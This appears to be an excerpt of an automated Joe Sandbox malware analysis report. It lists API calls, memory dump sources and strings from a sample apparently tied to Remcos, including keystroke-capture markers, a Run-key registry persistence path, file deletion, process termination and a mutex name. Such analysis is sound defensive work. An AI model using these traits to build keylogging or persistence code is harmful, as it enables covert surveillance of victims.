  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
APIs
• _free.LIBCMT ref: 00448825
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
• WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0078DC11,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0078C14D
• GetLastError.KERNEL32 ref: 0078C158
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-GJDISH
APIs
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: CommandLine
• String ID: (7h
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
• GetLastError.KERNEL32 ref: 0043FB02
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00781D3F), ref: 007BFD5B
• GetLastError.KERNEL32 ref: 007BFD69
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007BFDC4
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast